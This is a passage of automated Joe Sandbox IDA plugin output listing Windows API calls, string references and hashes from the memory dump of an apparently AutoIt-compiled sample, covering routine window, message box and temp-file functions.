                                                                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 0023761D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00237629
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00232699
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b451f5ff71d3bf4981efd6cb2e873b9080518be78f26a9b29a2397b600b8702a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 19168e0a369503e0cb49c06730fe793a0201771348dd22b7dd26837b4f358e1c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b451f5ff71d3bf4981efd6cb2e873b9080518be78f26a9b29a2397b600b8702a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F001B5B5A24215EBCB04ABA4CC96CFE7769FF56354F50061AA433A73C1DB71581CCA50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00232593
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3026b9ae6141a9b82dbd1ef817d6eca7cc310a8818517304bafe18414cb41772
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fce322415721ba29bf8c99ba5031c553d995b57630adb05b76a634348ac7ad65
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3026b9ae6141a9b82dbd1ef817d6eca7cc310a8818517304bafe18414cb41772
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C101A7B5A60105FBCF09EB90C9A6DFE77A9DF65744F90011AB803A3281DB509F1CD6B1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00232615
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 067b30456387e4c5d9ac066b65e7ebfc1ee1108ccd84b8454ad1eedccb39d009
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ab4d990e3a2cee3f3964d2e14ad5e3477881e2a39e6ffd9234866b9ea49ea6c4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067b30456387e4c5d9ac066b65e7ebfc1ee1108ccd84b8454ad1eedccb39d009
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01F7B1E24205E6CF05EB90C892EFE73ACDF15744F500016B803B3281DB509E1CDAB1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00232720
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e6bd88dbf2af6d3a846d6af86add231201a4809f73c31899ea65c5c3d5c107b5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 72c00dbca72ef7c1a5dc9a297461d94573329d8379edc623ac978208dd1594ea
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6bd88dbf2af6d3a846d6af86add231201a4809f73c31899ea65c5c3d5c107b5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20F0F4B5E60214E6CB04B7A48C96FFEB3ACFF11744F400A16B423A32C1DB60681CC660
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00269B6D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00269B53
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageProcSend
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 982171247-1658319840
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: 2< $j3'
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-731391251
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00268471
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0026847F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1378638983-1658319840
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0023146F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
APIs
  • Part of subcall function 001EFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001F10E2,?,?,?,001D100A), ref: 001EFAD9
• IsDebuggerPresent.KERNEL32(?,?,?,001D100A), ref: 001F10E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001D100A), ref: 001F10F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001F10F0
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
APIs
• __Init_thread_footer.LIBCMT ref: 001EF151
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: `5*$h5*
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002439F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00243A05
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00262DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00262DDB
  • Part of subcall function 0023F292: Sleep.KERNEL32 ref: 0023F30A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00262E08
• PostMessageW.USER32(00000000), ref: 00262E0F
  • Part of subcall function 0023F292: Sleep.KERNEL32 ref: 0023F30A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0020C213
• GetLastError.KERNEL32 ref: 0020C221
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0020C27C
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0